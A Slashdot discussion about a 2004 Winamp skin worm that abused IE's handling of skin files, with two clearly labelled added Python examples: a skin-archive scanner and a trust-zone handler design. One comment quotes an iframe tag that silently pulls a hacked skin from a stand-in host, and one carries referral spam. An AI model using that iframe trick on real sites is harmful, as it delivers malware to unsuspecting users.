Winamp Skin Exploit in the Wild
An anonymous reader writes "Secunia.com has announced an exploit (derived from xml escaping the Internet zone into IE's local zone) that exploits Winamp's habit of automatically installing skins. Currently all versions of Winamp are affected. Details on the Winamp forums - apparently an exploit is already in the wild, and spreading."
yet another way... (Score:5, Funny)
Luckily the masses of windows users are content to use windows media player which should slow the spread of this.
Re:yet another way... (Score:5, Insightful)
Seems like the same old crap to me...
You convince some sucker to download and load something that isn't what it says it is. We've reported AIM exploits that hide themselves as screensavers recently. [tech-recipes.com]
It's a major security problem when a program blindly executes something. Period.
It's a major security problem when people download untrusted winamp skins on IRC.
What can you do?
Re:yet another way... (Score:5, Funny)
Is calculator safe? (Score:5, Funny)
Re:yet another way... (Score:3, Funny)
Re:yet another way... (Score:3, Funny)
Damn you Britney! (Score:5, Funny)
I think I speak for a lot of people when I say... (Score:4, Insightful)
Re:Damn you Britney! (Score:3, Funny)
I've got you under my skin
I've got you deep in the heart of me
So deep in my heart, that you're really a part of me
I've got you under my skin
Re:Damn you Britney! (Score:4, Funny)
Well duh.
Pretty Girl + Virus = trouble in just about any context.
Throw "wife" into the equation and the result may be expressed both in terms of $$ and an unreal number.
Mozilla (Score:5, Insightful)
Re:Mozilla (Score:5, Informative)
Re:Mozilla (Score:3, Informative)
The author of Maxthon has said that the engine-switch option is there so web designers can check their pages quickly without having to have a multitude of browsers on their machines. It's not intended to be a generalized replacement for the IE libs that Maxthon i
Re:Mozilla (Score:3, Insightful)
Using anything from Microsoft's API in this day and age of alternatives is lazy programming, imho.
Re:Mozilla (Score:5, Informative)
The link is dead now, but I'm guessing the exe file just looks to see if mIRC is running, and gets the path, and extracts+runs some mIRC scripts. Classic trojan technique. Really not terribly difficult to make.
^^^
taken from Winamp Forums.
So does it matter?
say it out loud... (Score:3, Insightful)
WINDOWS
WINDOWS
WINDOWS
I don't care how leet folks think they are, as long as people run windows stuff, develop for windows, run windows apps, think about windows, they are gonna get hosed, sooner or later.
You would think after 10 years of this stuff that it would be noticed. Nope, folks still think just one more patch or one more version higher...
Re:Mozilla (Score:5, Informative)
The bug isn't that the browser passes the file to the correct handler app, but that the app itself executes code it shouldn't.
Re:Mozilla (Score:3, Insightful)
The real problem is that DOS was never designed to be networked, and that carried over into Windows. NT's access control is based on VAX/VMS, which is rather OTT for most people's requirements, and so most people simply don't use it. Unix/Linux/OSX access control, while less sophisticated, is at least more likely to be used prop
Can I name the worm?? (Score:5, Funny)
Re:Assistance for the clueless (Score:5, Informative)
Flensing means to remove the skin [bartleby.com] from something.
Further evidence that skinning is stupid (Score:5, Funny)
Re:Further evidence that skinning is stupid (Score:2, Insightful)
Alas, people like shiny, blinky, glowy things aka bling.
I won't bother saying what I think of 'skinning' on account it would be moderated as a troll or less because most people like shiny, blinky, glowy things aka bling and I don't...
Am I the only one... (Score:5, Interesting)
Re:Am I the only one... (Score:5, Funny)
Simple solutions (Score:5, Informative)
OR
Don't use skins at all.
Re:Simple solutions (Score:3, Informative)
Re:Simple solutions (Score:5, Informative)
That would be fine advice if the victims knew they were downloading a Winamp skin. The link, however, looks like it is an image file: Going clicky-clicky (or otherwise following the link) executed a PHP script which would serve up a Winamp skin. Since many users have their browsers automagically handle Winamp skins, it would immediately get handed off to Winamp to execute. The skin linked to several files that eventually called an executable within the skin package which in turn loaded one's mIRC client with a script that spat out the above message.
The victims probably didn't know what hit them.
Re:Simple solutions (Score:3, Informative)
Re:Simple solutions (Score:3, Interesting)
Re:Simple solutions (Score:3, Insightful)
Winamp parses the XML file which contains an embedded link to the
Why are markup languages allowed to link to executables? Allowing arbitrary hotlinks to an untrusted location without proper validation is a security hole the size of an aircraft carrier.
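The check a practitioner would want after the two comments above (the skin's XML chaining through to an executable inside the package, and the question of why markup is allowed to link to executables at all): an added example, not code from the page or from Nullsoft, that opens a .wsz/.wal skin archive (both are zip files) and flags members with executable extensions, XML attributes that point at such members or at external URLs, and member names that would escape the extraction directory. The element and attribute names in the constructed sample skins, the extension list and the finding strings are assumptions; the real modern-skin XML schema is not described on the page.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Extensions Windows treats as native code or script. Assumed list; extend as needed.
EXEC_EXTS = {".exe", ".dll", ".com", ".bat", ".cmd", ".scr", ".pif",
             ".vbs", ".js", ".wsf", ".hta"}
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://")


def _ext(path):
    """Lower-case extension of the last path component, '' if there is none."""
    leaf = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return leaf[leaf.rfind("."):] if "." in leaf else ""


def _scan_xml(member, raw):
    """Flag attributes that reference executables or point outside the archive."""
    out = []
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        return ["%s: unparseable XML (%s)" % (member, exc)]
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            v = value.strip()
            if URL_RE.match(v.lower()):
                out.append("%s: <%s %s> points outside the package: %s"
                           % (member, elem.tag, attr, v))
            elif _ext(v) in EXEC_EXTS:
                out.append("%s: <%s %s> references executable: %s"
                           % (member, elem.tag, attr, v))
    return out


def scan_skin(data):
    """Return a list of findings for a skin archive given as bytes.
    An empty list means nothing suspicious was seen, not that the skin is safe."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    findings = []
    with zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            # Member names that would write outside the skin directory on extraction.
            if name.startswith(("/", "\\")) or ".." in parts or re.match(r"^[A-Za-z]:", name):
                findings.append("path traversal in member name: %s" % name)
            if _ext(name) in EXEC_EXTS:
                findings.append("executable member: %s" % name)
            if _ext(name) == ".xml":
                findings.extend(_scan_xml(name, zf.read(info)))
    return findings


def build_sample_skin(malicious):
    """Constructed sample archives for demonstration; the layout is assumed, not Winamp's schema."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if malicious:
            zf.writestr("skin.xml",
                        '<skin><include file="xml/player.xml"/>'
                        '<bitmap id="bg" file="loader.exe"/></skin>')
            zf.writestr("xml/player.xml", '<layout><script file="update.js"/></layout>')
            zf.writestr("loader.exe", b"MZ" + b"\x00" * 14)   # fake PE header, constructed
        else:
            zf.writestr("skin.xml",
                        '<skin><include file="xml/player.xml"/>'
                        '<bitmap id="bg" file="images/main.png"/></skin>')
            zf.writestr("xml/player.xml", "<layout/>")
            zf.writestr("images/main.png", b"\x89PNG\r\n\x1a\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_skin(build_sample_skin(True)):
        print(finding)
```

Running it prints three findings for the constructed malicious skin (the executable member, the bitmap attribute pointing at it, and the script reference in the included layout) and nothing for the clean one. Nested XML includes are covered simply because every .xml member is scanned, whatever directory it sits in.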
As long as... (Score:3, Funny)
All versions are affected? (Score:5, Informative)
Is 2.x actually susceptible or is the submitter incorrect?
Re:All versions are affected? (Score:5, Informative)
If you unchecked "Modern Skin Support" in the installer you are also NOT affected.
You can even remove Modern Skin Support just by renaming Program Files\Winamp\Plugins\gen_ff.dll to gen_ff.dll.old. This will remove the exploit.
If you fix this way, you will only be able to use classic skins.
Re:All versions are affected? (Score:5, Informative)
What many people don't realize is that Winamp 5 IS Winamp 2 (Check out this article [winamp.com].). It's the same code, but with extra plug-ins bundled in. The user can choose which plug-ins or features he wants to include or not include when installing. So I'm not sure how you could call the application bloated when the app installs only what the user feels he or she needs.
All Versions? (Score:5, Informative)
Re:All Versions? (Score:2)
Re:All Versions? (Score:2)
Yeah, 3.x was a mess... but 5.x is based on the 2.x version with the modern skin support added in. On my (albeit fast) PC it routinely sits in the background playing MP3s consuming a bit over 5mb of RAM and using 0% CPU.
The Media Library is decent, like iTunes but without genre browsing, and far more customizable. And it isn't a complete piece of shite like iTunes for Windows is.
i hate skins (Score:2, Interesting)
Re:i hate skins (Score:2)
Apparently not. [slashdot.org]
Re:i hate skins (Score:3, Informative)
Re:i hate skins (Score:3, Interesting)
Ever changing interfaces would indeed be an annoyance, but the point of skins is to let you find the UI you like and stick with it. For any individual user the UI is the same (unless you really want to keep changing it); it's just that different users can have different UIs.
Its a bit like the "bloat" in large applications like Word. Of course most users only use 10-20% of Word's features, but each person can use a subtly different 10-2
Re:i hate skins (Score:4, Interesting)
I don't go with random skins, or frequently changing skins. I just browse the library, pick a good one, and stick with it.
Re:i hate skins (Score:2)
Re:i hate skins (Score:3, Insightful)
Pick an interface they like? Hah. I wish I could pick the skin I like: None at all. Something that makes the application's interface look and work exactly like every other application I run instead of some incomprehensible and unusable artistic garbage.
Re:i hate skins (Score:3, Insightful)
Why does it have to be ever changing? Find the look you like and stick with it. If that happens to be the default, great.
Re:i hate skins (Score:2)
no transitions
etc etc
Redmond school of engineering (Score:5, Interesting)
Fixes... (Score:5, Informative)
Re:Fixes... (Score:5, Insightful)
Re:Fixes... (Score:3, Informative)
According to the Winamp forums, the default Firefox configuration is just as susceptible to this exploit as IE is. You can change your settings in either browser so that it is not affected by your exploit.
Fortunately, I use Mozilla. :)
Winamp Unlimited Has The Full Report (Score:5, Informative)
Winamp Unlimited [winampunlimited.com] has a friendly summary on how the worm infects the user, as well as steps one can take to avoid being infected.
This is also worth noting: "The Nullsoft team have already implemented a patch for this exploit, which will be included in a very-near future release 5.04a or 5.05. This next version is already in its third beta stage, and will include several other unrelated changes/fixes."
Skinning is Worth It (Score:5, Funny)
I mean, WinAmp can actually look like different kinds of real CD players! Can you believe that? It can look like all sorts of things; it doesn't have to look like a rectangular window at all. That just rocks! You can even change the way it looks at runtime! You can download whole new looks! Man, that is too cool.
Kudos to those guys. This is the kind of thing that really makes computing fun.
Re:Skinning is Worth It (Score:2)
things to say (Score:3, Insightful)
(1) I've not used WinAmp in many years [like I've not used Windows in many years], but when Secunia says the advised course of action is "use another product", I'm guessing that that probably means this feature can not be disabled, or at least not easily? Or if it can be, then its disabling can also be circumvented?
(2) Absolutely right, having a component of the system that is active to ALL programs, whether it wants it or not, is inviting the most bizarre of security holes. Of course, the WinAmp people probably should come up with a better, more secure transport method for getting their skins around, but it's not really their fault that IE is a pile of crap security wise.
(3) What kinda genius would figure out that you could embed an xml file, with instructions to run a specific executable file, within a zipped skin file, and then manage to trigger a security hole in a web-browser module that really shouldn't have a damn thing to do with the program that you're sending this virus through? The people who are BREAKING the security I figure have got to be infinitely more intelligent than the people who are CREATING the security.. or at least a whole hell of a lot more creative..
i really can't imagine that anyone could be thinking, when they write a program like this, "oh, what if someone tries to take advantage of such and such known security flaw in this way through our program, even though they don't have jack and shit to do with each other?"
Obviously, you're going to try to cover in advance for security things, but who could predict an attack in such a convoluted fashion?
Re:things to say (Score:3, Insightful)
Re:things to say (Score:2, Insightful)
That's precisely what this is. It's like checking for secret doors in a dungeon in an old RPG like Bard's Tale. One step forward, check right, check left. One step forward, check right, check left. Repeat until you find an opening.
This sort of thing could very easily affect Linux as well. As much as I love Linux I've been waiting for someone to spring something like this through Mozilla. It's only a matter of time before someone figures it out.
Re:things to say (Score:4, Informative)
It is possible [slashdot.org] to easily fix this problem.
Skinny Dipping (Score:3, Insightful)
Re:Skinny Dipping (Score:4, Informative)
http://http//www.crackbaby.com/article.php?sid=10
Not tried it myself yet, but it replaces all calls to IE with calls to the browser of your choice.
Expect these to grow more common... (Score:5, Interesting)
Now that people have started to use firewalls, and the risk of worms and rootkits that infect through open, exploitable, holes grows smaller, it is time to expect more and more exploits to follow alternative vectors.
Note how many buffer-overflow exploits there have been in server daemons. Well, there is no reason to believe that servers are any worse written with regards to input than client applications - quite the contrary actually.
People think they are safe with a firewall. But I'm willing to bet there are undiscovered exploits in just about every application they run. WinZip? WinAMP? Acrobat Reader? Media player? Anything that handles files received over the Internet is potentially a vector for viruses and possibly worms.
This time it was bad escaping, which made the exploit trivial, but there a buffer overflow would have served just as well. Neither firewalls nor anti-virus software will protect you.
Summary of article summary (Score:2, Redundant)
Dumb Question (Score:5, Interesting)
For what possible purpose does a skin -- which is essentially nothing more than graphical elements -- need to invoke the browser?
WTF? Seriously, help me out here. I've only been a programmer for 25 years, so I may not understand the deeply compelling reasons driving such a design decision.
Schwab
Re:Dumb Question (Score:2, Informative)
Dumb Answer (Score:3, Interesting)
*raises hand*
Because since the late 90s EVERY PROGRAM must use the internet in some way. Useful or not. Anyone else notice this trend?
Re:Dumb Question (Score:5, Informative)
They did this not because it's a good idea for every application to have internet access and rich scripting with only a token sandbox about the potentially untrusted data they're displaying, but because they wanted to keep the DoJ from forcing them to compete with other companies that were producing web browsers.
My response at the time was to ban the use of IE, Outlook, and any other application that I could think of or that I found out about that was using this component to view untrusted documents. Well, I didn't ban them directly, I talked our CEO into it. I figured that most IT administrators and managers would do the same, because this was obviously just asking for trouble (I didn't know what trouble it would cause, but I knew it was asking for it). Then, when Melissa hit a little while later, I figured THAT would finally be enough to get people to ban these "typhoid mary" applications. I mean, anyone could tell this was doomed.
Boy, was I naive. I forgot that people who haven't worked on computer security aren't nearly paranoid enough. I expect that on the 10th anniversary of the integration of IE with the desktop people will still believe Microsoft when they say they're serious about security this time.
And I never would have imagined that Apple would follow suit and use the same LaunchServices for local applications opening things like help files and for web browsers to run plugins, helper apps, and so on...
For the love of god, people, get on the horn to Microsoft, and Apple, and the folks at Mozilla.org who are still using these inherently broken APIs themselves (yes, Firefox has been demonstrated to respond to a couple of the same exploits). Tell them that ENOUGH is ENOUGH. You can't fix this with better heuristics, you can only fix it by making the sandbox unconditional... separate the display code and the access code and give each application a choice of bindings (at the VERY least, 'this is the binding for trusted documents, this is the binding for untrusted documents, and this is the binding for you specifically').
haven't used WinAmp in 5 years. (Score:2)
http://www.quinnware.com
revenge (Score:5, Funny)
More support for JWZ's audiocock technology. (Score:2)
back to media player.. (Score:3, Interesting)
"Can't trust those evil 3rd party hacker programs... That's what they say, they wouldn't lie.. See, this just proves it.."
Not that Microsoft would be *that* evil to release exploits for 3rd party apps.... but it's an idea..
Winamp's or IE's fault? (Score:4, Interesting)
This isn't the first app that gets nailed just because it was using IE (for whatever extent of use - full rendering or peripheral stuff like SSL Certificate handling or XML processing).
Just add this to the IE screwups tally
get a free iPod! [freeipods.com][This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier
i'm famous! (Score:3, Interesting)
Just to add to the original thread a little, I only saw the worm spreading on IRC and I only saw 2 people who were spamming the link - like all mirc worms the infected person doesn't know they are doing it until someone tells them.
I guess it's not got very far - since I reported the exploit i've not seen another spammed link for it.
The RIAA press release.... (Score:3, Funny)
Even more fun... (Score:4, Insightful)
Foo! (Score:5, Insightful)
It isn't just the skin... (Score:3, Informative)
<iframe src="http://www.blah.com/winamphackedskin.wsz"></iframe>
That right there, in any browser, will initiate a download of the winamp skin file. In Opera/Firefox/Mozilla you are given a download confirmation prompt. However, if IE is your default browser then IE will auto download and install the winamp skin without your knowledge.. or at least until your winamp pops up suddenly with a new skin. We can't tell people to "don't download skins" merely because it's far more serious than that. Manual skin changing or not, that iframe trick is going to nail a lot of people.
The best bet would be to ignore winamp completely until a patch can be provided, or have Firefox set as your default browser.
Suggestion to Windows yet NON-IE users (Score:3, Interesting)
When will software companies and developers learn? (Score:3, Insightful)
Re:Easy fix (Score:3, Insightful)
Re:Easy fix (Score:2)
but um... what about listening to internet radio stations? how about when you use it to sample music online? a lot of those online music sites (mp3.com for example) have a
Re:Easy fix (Score:3, Informative)
Re:Macs (Score:2)
Re:Macs (Score:2)
How to fix IE, Safari, and everything else... (Score:5, Insightful)
If you use the *same* application, API, or application binding (eg, the file type bindings used by the desktop and the MS HTML control, or Apple's LaunchServices) for both sandboxed and trusted objects, then you open up the possibility that an untrusted object will look like a trusted object, or that an untrusted object will be passed to a handler that isn't inherently safe.
Apple blew this with launchServices, and they still haven't really fixed the underlying problem. But they've only been in denial a few months, whereas Microsoft has been in denial about this for seven years, so let's look at Microsoft...
Let's suppose the HTML control was split up, so it only did rendering. Whenever it wanted to open a file, open a URL, run a script, load a plug-in, it would ask the parent application "what do I do about a CHM file" or "what do I do about <script language=vbscript>". You'd have an "HTML-only control" and a "Web Access control" and IE would be a very slightly thicker wrapper around both.
So then you register "Word Viewer"[1] with Outlook and IE as the helper application for Word documents, and "Word" with Windows Explorer as the helper application for trusted Word documents. If this was done, then Outlook (which would be a sandboxing application in this model) would open "Word Viewer" for untrusted documents.
Voila, no more email-spread Word macro viruses.
Similarly, Outlook would decline to run VBscript, and IE would decline to run the Windows Update plugin... you'd have a Windows Update program that was a thin shell around the HTML-only control... one that only opened windows update.
Microsoft could have their cake and eat it too, and EVERYONE would have a more secure and less spammy environment.
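The binding model argued for in the comment above, as an added example that is not part of the original post or of any shipping product: a Python handler table keyed on (content type, trust zone). Three properties carry the argument. The type comes from the leading bytes, not from the link text or extension, because the bait in this worm looked like an image and was served as a skin archive. The zone comes from where the object arrived (a local file is trusted; anything fetched over a network scheme is not). And lookup is exact: an untrusted object whose type has no untrusted binding is refused rather than falling through to the trusted handler. The handler names, the magic-byte table and the origin-to-zone rule are assumptions for illustration.

```python
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

TRUSTED = "trusted"      # user opened it from the local shell
UNTRUSTED = "untrusted"  # arrived over the network: web page, mail, IRC link


def classify(data: bytes) -> str:
    """Type from leading bytes, never from the extension or the link text.
    Magic values here are the usual ones but this table is an assumed subset."""
    if data.startswith(b"PK\x03\x04"):
        return "zip-archive"        # .wsz/.wal skins are zip files
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"MZ"):
        return "pe-executable"
    if data.lstrip().lower().startswith((b"<html", b"<!doctype html")):
        return "html"
    return "unknown"


def zone_of(origin: str) -> str:
    """Local files are trusted; any other scheme (http, ftp, mailto, none) is not."""
    return TRUSTED if urlsplit(origin).scheme.lower() == "file" else UNTRUSTED


class HandlerTable:
    """Separate bindings per zone. resolve() does exact lookup only: there is no
    fallback from the untrusted binding to the trusted one, so an unbound
    (type, untrusted) pair is refused."""

    def __init__(self) -> None:
        self._bindings: Dict[Tuple[str, str], str] = {}

    def bind(self, ctype: str, zone: str, handler: str) -> None:
        self._bindings[(ctype, zone)] = handler

    def resolve(self, ctype: str, zone: str) -> Optional[str]:
        return self._bindings.get((ctype, zone))


def dispatch(table: HandlerTable, data: bytes, origin: str) -> Tuple[str, str, str]:
    """Return ("open", handler, ctype) or ("refuse", reason, ctype)."""
    ctype = classify(data)
    zone = zone_of(origin)
    handler = table.resolve(ctype, zone)
    if handler is None:
        return ("refuse", "no %s binding for %s" % (zone, ctype), ctype)
    return ("open", handler, ctype)


def default_table() -> HandlerTable:
    """Hypothetical policy: images are harmless in either zone, HTML from the
    network gets the render-only control, skins and executables are only
    opened when they came from the local shell."""
    t = HandlerTable()
    for img in ("png", "jpeg"):
        t.bind(img, TRUSTED, "image-viewer")
        t.bind(img, UNTRUSTED, "image-viewer")
    t.bind("html", TRUSTED, "full-browser")
    t.bind("html", UNTRUSTED, "html-only-renderer")
    t.bind("zip-archive", TRUSTED, "winamp")          # deliberately no untrusted binding
    t.bind("pe-executable", TRUSTED, "shell-execute")  # deliberately no untrusted binding
    return t


if __name__ == "__main__":
    table = default_table()
    # Constructed inputs: a zip served under an image name, and a real JPEG.
    print(dispatch(table, b"PK\x03\x04" + b"\x00" * 26, "http://www.blah.com/pretty.jpg"))
    print(dispatch(table, b"\xff\xd8\xff\xe0", "http://www.blah.com/pretty.jpg"))
    print(dispatch(table, b"PK\x03\x04" + b"\x00" * 26, "file:///C:/skins/mine.wsz"))
```

The first call is the worm's delivery shape: the name says image, the bytes say skin archive, the origin says network, and the result is a refusal with the reason spelled out. The same bytes opened from a local path go to the player. Adding a new type to the table only ever widens what the untrusted zone can open if someone explicitly binds it there, which is the property the comment is asking for.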
Uh... footnote I forgot... (Score:2)
Re:Macs (Score:3, Insightful)
I realize you're trolling, but I'm bored...
Yes, Apple DOES decide for you that you need a web browser in every application on the operating system. Is it insecure? Well, not that we know of right now, because Apple patches the holes when they're found, just like Microsoft does (but yes, Apple's browser does have fewer security holes than Microsoft'
Re:Macs (Score:2)
Re:Macs (Score:2)
Re:Just another reason (Score:2, Insightful)
Re:Just another reason (Score:2)
I always changed this to show the album like you mentioned.
Re:Just another reason (Score:2, Insightful)
Re:Just another reason (Score:2)
Of course unchecking "modern skin support" in Winamp would remove the security risk as well.
Re:Just another reason (Score:2)
XMMS+Crossfade is great for things like LOTR soundtrack or just regular albums where songs go over tracks - no horrible pauses.
I just wish it had decent album management. imo Musicmatch Jukebox has the best library management system.
Re:Just another reason to use iTunes, I guess (Score:3, Funny)
Re:Just another reason to use iTunes, I guess (Score:3, Informative)
Seriously man... posting this comment in a thread detailing an exploit in your elitist program is kinda... retarded.
WinAmp exploits: 2 (that I know of [securiteam.com])
iTunes exploits: 0
Let's keep score.
Re:Just another reason to use iTunes, I guess (Score:2, Insightful)
Memory is cheap, but that doesn't mean I want Apple deciding it can just
Re:School must've just gotten out. (Score:5, Funny)
vocabularical [reference.com].
I believe you were saying something?
Re:winamp skin (Score:2, Insightful)
It's really annoying that IE integration can't be disabled, or if it's even possible to integrate with another browser.
I don't know exactly how it works, but certain streams will pop open the Winamp browser window to the stream's home page and the stream's home page has popups.
In fact, due to integration with IE, even if you don't use IE for an
Re:Winamp 2.xx..... (Score:5, Informative)
5.x playing in the background using 0% CPU and under 6mb of RAM... about what 2.x uses... with a feature-set comparable to iTunes without the huge iTunes resource overhead, 3 installed services, etc, etc. A "lightweight" media player like foobar2000 is ~1% CPU and 11mb RAM.
Re:Super-simple MP3 Player (Score:3, Informative)
Of course, they had to put in "themes", but at least it doesn't download them itself.
Re:Super-simple MP3 Player (Score:4, Informative)
http://www.foobar2000.org/ [foobar2000.org]
Handy, simple, small, and will go straight to the system tray.